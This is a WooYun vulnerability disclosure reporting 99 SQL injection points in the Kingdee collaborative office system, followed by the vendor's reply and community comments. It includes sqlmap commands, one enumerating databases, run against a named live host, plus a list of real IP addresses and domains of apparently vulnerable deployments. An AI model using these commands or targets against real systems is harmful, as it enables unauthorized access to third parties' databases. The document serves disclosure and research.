当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0140344

漏洞标题:金蝶协作办公系统存在99个高危SQL注射

相关厂商:金蝶

漏洞作者: 路人甲

提交时间:2015-09-11 12:23

修复时间:2015-12-13 09:29

公开时间:2015-12-13 09:29

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-11: 细节已通知厂商并且等待厂商处理中
2015-09-14: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-11-08: 细节向核心白帽子及相关领域专家公开
2015-11-18: 细节向普通白帽子公开
2015-11-28: 细节向实习白帽子公开
2015-12-13: 细节向公众公开

简要描述:

金蝶协作办公系统存在99个高危SQL注射

详细说明:

“为保护客户利益,不在接受任何漏洞通报”
既然你们都这样说了,还是继续发漏洞吧 希望能纠正错误的观念
存在漏洞的文件,总共有3个文件 但分布在33个目录下面,3*33=99个

/portal/portlet/custom_Analytical/set.jsp
/portal/portlet/custom_Analytical_diagram/set.jsp
/portal/portlet/document/set.jsp
/portal/portlet/document_req/set.jsp
/portal/portlet/flow_performance_list/set.jsp
/portal/portlet/flow_performance_show/set.jsp
/portal/portlet/guestbook/set.jsp
/portal/portlet/guestbook_new/set.jsp
/portal/portlet/news_photos/set.jsp
/portal/portlet/office_history/set.jsp
/portal/portlet/office_process/set.jsp
/portal/portlet/outpage/set.jsp
/portal/portlet/person_doc_list/set.jsp
/portal/portlet/person_mail/set.jsp
/portal/portlet/person_new_doc/set.jsp
/portal/portlet/person_new_mail/set.jsp
/portal/portlet/person_new_plan/set.jsp
/portal/portlet/person_plan/set.jsp
/portal/portlet/pubinfo_bbs/set.jsp
/portal/portlet/pubinfo_db_conn/set.jsp
/portal/portlet/pubinfo_discuss/set.jsp
/portal/portlet/pubinfo_images/set.jsp
/portal/portlet/pubinfo_links/set.jsp
/portal/portlet/pubinfo_news/set.jsp
/portal/portlet/pubinfo_new_bbs/set.jsp
/portal/portlet/pubinfo_new_discuss/set.jsp
/portal/portlet/pubinfo_new_links/set.jsp
/portal/portlet/pubinfo_new_news/set.jsp
/portal/portlet/pubinfo_new_onLine/set.jsp
/portal/portlet/pubinfo_onLine/set.jsp
/portal/portlet/pubinfo_url/set.jsp
/portal/portlet/resource/set.jsp
/portal/portlet/userlink/set.jsp
/portal/portlet/custom_Analytical/set_submit.jsp
/portal/portlet/custom_Analytical_diagram/set_submit.jsp
/portal/portlet/document/set_submit.jsp
/portal/portlet/document_req/set_submit.jsp
/portal/portlet/flow_performance_list/set_submit.jsp
/portal/portlet/flow_performance_show/set_submit.jsp
/portal/portlet/guestbook/set_submit.jsp
/portal/portlet/guestbook_new/set_submit.jsp
/portal/portlet/news_photos/set_submit.jsp
/portal/portlet/office_history/set_submit.jsp
/portal/portlet/office_process/set_submit.jsp
/portal/portlet/outpage/set_submit.jsp
/portal/portlet/person_doc_list/set_submit.jsp
/portal/portlet/person_mail/set_submit.jsp
/portal/portlet/person_new_doc/set_submit.jsp
/portal/portlet/person_new_mail/set_submit.jsp
/portal/portlet/person_new_plan/set_submit.jsp
/portal/portlet/person_plan/set_submit.jsp
/portal/portlet/pubinfo_bbs/set_submit.jsp
/portal/portlet/pubinfo_db_conn/set_submit.jsp
/portal/portlet/pubinfo_discuss/set_submit.jsp
/portal/portlet/pubinfo_images/set_submit.jsp
/portal/portlet/pubinfo_links/set_submit.jsp
/portal/portlet/pubinfo_news/set_submit.jsp
/portal/portlet/pubinfo_new_bbs/set_submit.jsp
/portal/portlet/pubinfo_new_discuss/set_submit.jsp
/portal/portlet/pubinfo_new_links/set_submit.jsp
/portal/portlet/pubinfo_new_news/set_submit.jsp
/portal/portlet/pubinfo_new_onLine/set_submit.jsp
/portal/portlet/pubinfo_onLine/set_submit.jsp
/portal/portlet/pubinfo_url/set_submit.jsp
/portal/portlet/resource/set_submit.jsp
/portal/portlet/userlink/set_submit.jsp
/portal/portlet/custom_Analytical/view.jsp
/portal/portlet/custom_Analytical_diagram/view.jsp
/portal/portlet/document/view.jsp
/portal/portlet/document_req/view.jsp
/portal/portlet/flow_performance_list/view.jsp
/portal/portlet/flow_performance_show/view.jsp
/portal/portlet/guestbook/view.jsp
/portal/portlet/guestbook_new/view.jsp
/portal/portlet/news_photos/view.jsp
/portal/portlet/office_history/view.jsp
/portal/portlet/office_process/view.jsp
/portal/portlet/outpage/view.jsp
/portal/portlet/person_doc_list/view.jsp
/portal/portlet/person_mail/view.jsp
/portal/portlet/person_new_doc/view.jsp
/portal/portlet/person_new_mail/view.jsp
/portal/portlet/person_new_plan/view.jsp
/portal/portlet/person_plan/view.jsp
/portal/portlet/pubinfo_bbs/view.jsp
/portal/portlet/pubinfo_db_conn/view.jsp
/portal/portlet/pubinfo_discuss/view.jsp
/portal/portlet/pubinfo_images/view.jsp
/portal/portlet/pubinfo_links/view.jsp
/portal/portlet/pubinfo_news/view.jsp
/portal/portlet/pubinfo_new_bbs/view.jsp
/portal/portlet/pubinfo_new_discuss/view.jsp
/portal/portlet/pubinfo_new_links/view.jsp
/portal/portlet/pubinfo_new_news/view.jsp
/portal/portlet/pubinfo_new_onLine/view.jsp
/portal/portlet/pubinfo_onLine/view.jsp
/portal/portlet/pubinfo_url/view.jsp
/portal/portlet/resource/view.jsp
/portal/portlet/userlink/view.jsp


由于均存在说这三个文件,随便选择一个目录下的文件做测试,这里为document目录:

sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/portal/portlet/document/set.jsp?portal_id=1"

1.png


sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/portal/portlet/document/set_submit.jsp?portlet_id=1"

2.png


sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/portal/portlet/document/view.jsp?portal_id=1&portlet_id=1"

3.png


sqlmap测试的数据:

sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/portal/portlet/document/set.jsp?portal_id=1" --dbs

data.png


案例:

http://oa.guanhao.com:8080/kingdee/login/loginpage.jsp
http://222.179.238.182:8082/kingdee/login/loginpage2.jsp
http://221.4.245.218:8080/kingdee/login/loginpage.jsp
http://220.189.244.202:8080/kingdee/login/loginpage.jsp
http://222.133.44.10:8080/kingdee/login/loginpage.jsp
http://60.194.110.187/kingdee/login/loginpage.jsp
http://oa.roen.cn/kingdee/login/loginpage.jsp
http://221.226.149.17:8080/kingdee/login/loginpage.jsp
http://221.226.149.17:8080/kingdee/login/loginpage.jsp
http://223.95.183.6:8080/kingdee/login/loginpage.jsp
http://122.139.60.103:800/kingdee/login/loginpage.jsp
http://222.134.77.23:8080/kingdee/login/loginpage.jsp
http://61.190.20.51/kingdee/login/loginpage.jsp

漏洞证明:

sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/portal/portlet/document/set.jsp?portal_id=1" --dbs

data.png

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-12-13 09:29

厂商回复:


白帽子兄弟们,这个产品是金蝶公司多年前代理的上海协达公司产品,上海协达公司回复无法打补丁修复漏洞,只有升级替换产品,所以无法短期内处理。 对于白帽子的付出,我们一直表示肯定和支持,也一起会根据情况给予奖励,未来还会加入奖励!希望大家继续关注金蝶安全!

最新状态:

暂无

漏洞评价:

评论

  1. 2015-09-11 12:25 | 牛肉包子 ( 普通白帽子 | Rank:254 漏洞数:64 )

    我吓尿了

  2. 2015-09-11 12:29 | 牛 小 帅 ( 普通白帽子 | Rank:566 漏洞数:140 | 茶凉了,就不要再续了,再续也不是原来的味...)

    99个 尼玛怎么贴的

  3. 2015-09-11 12:37 | M4sk ( 普通白帽子 | Rank:1218 漏洞数:322 | 国内信息安全任重而道远,还需要厂商和白帽...)

    99个 。。。。

  4. 2015-09-11 12:45 | Huc-Unis ( 普通白帽子 | Rank:1148 漏洞数:316 | 收购乌云币,转账自付手续费,感谢每天可三...)

    这套系统已经木有任何价值了

  5. 2015-09-11 12:50 | ago ( 普通白帽子 | Rank:519 漏洞数:83 )

    该系统已下线

  6. 2015-09-11 12:54 | 有归于无 ( 普通白帽子 | Rank:100 漏洞数:20 | 有归于无)

    卧槽

  7. 2015-09-11 13:22 | _Thorns ( 普通白帽子 | Rank:1376 漏洞数:219 | WooYun is the Bigest gay place :))

    厂商已倒闭。

  8. 2015-09-11 13:37 | chainhelen ( 路人 | Rank:2 漏洞数:1 | OUC vimer linuxer)

    研发已经哭晕在厕所。。。

  9. 2015-09-11 13:40 | Hex ( 路人 | Rank:20 漏洞数:11 | Do you know what is worth fighting for?)

    开发已自杀

  10. 2015-09-11 13:48 | 大大灰狼 ( 普通白帽子 | Rank:248 漏洞数:53 | Newbie)

    还差一个就100了

  11. 2015-09-11 14:03 | 金蝶(乌云厂商)

    白帽子兄弟们,这个产品是金蝶公司多年前代理的上海协达公司产品,上海协达公司回复无法打补丁修复漏洞,只有升级替换产品,所以无法短期内处理。对于白帽子的付出,我们一直表示肯定和支持,也一起会根据情况给予奖励,未来还会加入奖励!希望大家继续关注金蝶安全!

  12. 2015-09-11 14:06 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    动主在提交一个凑个整数啊

  13. 2015-09-11 15:56 | 不能忍 ( 实习白帽子 | Rank:77 漏洞数:39 | 要工作了。)

    爆炸啊,这么多99个sql注入,99*200=19800¥发财了!

  14. 2015-09-12 17:27 | Huc-Unis ( 普通白帽子 | Rank:1148 漏洞数:316 | 收购乌云币,转账自付手续费,感谢每天可三...)

    @不能忍 朋友你想多了,2000个大洋差不多,系统漏洞超过至少40多处的,无论打包多少,目测都是2000大洋,刷还不让你刷,做人要厚道,

  15. 2015-09-14 14:11 | 岛云首席鉴黄师 ( 普通白帽子 | Rank:332 漏洞数:103 | 妈妈,我要上电视)

    @疯狗 不是再提交25个才能凑整数么?

  16. 2015-09-15 18:37 | 贫道来自河北 ( 普通白帽子 | Rank:1465 漏洞数:438 | 一个立志要把乌云集市变成零食店的男人)

    估计是不让你刷啦

  17. 2015-09-16 09:02 | 大师兄 ( 路人 | Rank:14 漏洞数:6 | 每日必关注乌云)

    各个角落到处翻,金蝶工程在码砖,坐等rank满心欢,厂商忽略忒心酸,冲冠一怒全撸穿!

  18. 2015-09-16 21:05 | U神 ( 核心白帽子 | Rank:1335 漏洞数:147 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    我日,这是史上通用打包最多的吧?